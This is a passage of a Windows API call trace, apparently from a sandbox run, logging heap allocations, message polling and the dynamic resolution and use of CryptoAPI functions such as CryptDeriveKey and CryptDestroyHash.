(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0264.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0264.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0264.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0264.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0264.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0264.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0264.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0264.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0264.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0264.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0264.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0264.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0264.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0264.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0264.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0264.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0264.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0264.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0264.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0264.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0264.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0264.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0264.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0264.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0264.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0264.675] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0264.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0264.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0264.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0264.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0264.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0264.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0264.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0264.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0264.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0264.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0264.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0264.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0264.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0264.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0264.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0264.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0264.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0264.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0264.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0264.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0264.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0264.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0264.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0264.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0264.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0264.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0264.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0264.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0264.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0264.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0264.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0264.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0264.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0264.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0264.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51bc8 [0264.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51bc8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0264.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0264.678] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0264.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0264.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0264.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0264.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0264.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0264.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0264.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0264.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0264.678] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87550, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87310) returned 1 [0264.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15a18 [0264.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0264.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0264.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0264.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0264.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0264.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0264.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0264.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0264.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0264.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0264.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0264.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0264.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0264.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0264.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0264.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0264.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52168 [0264.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0264.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52168 | out: hHeap=0x970000) returned 1 [0264.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0264.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0264.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52150 [0264.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52180 [0264.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0264.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52180 | out: hHeap=0x970000) returned 1 [0264.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52150 | out: hHeap=0x970000) returned 1 [0264.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52000 [0264.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f10 [0264.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ee0 [0264.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0264.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ee0 | out: hHeap=0x970000) returned 1 [0264.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f10 | out: hHeap=0x970000) returned 1 [0264.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0264.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0264.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0264.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0264.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0264.682] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0264.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0264.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0264.682] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.682] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0264.682] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0264.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0264.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0264.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0264.686] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.686] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0264.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0264.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0264.687] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0264.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0264.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0264.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0264.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a68 [0264.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0264.687] CryptDestroyHash (hHash=0xa87550) returned 1 [0264.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0264.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0264.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0264.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0264.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0264.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0264.688] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0264.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0264.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0264.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.688] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0264.688] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, 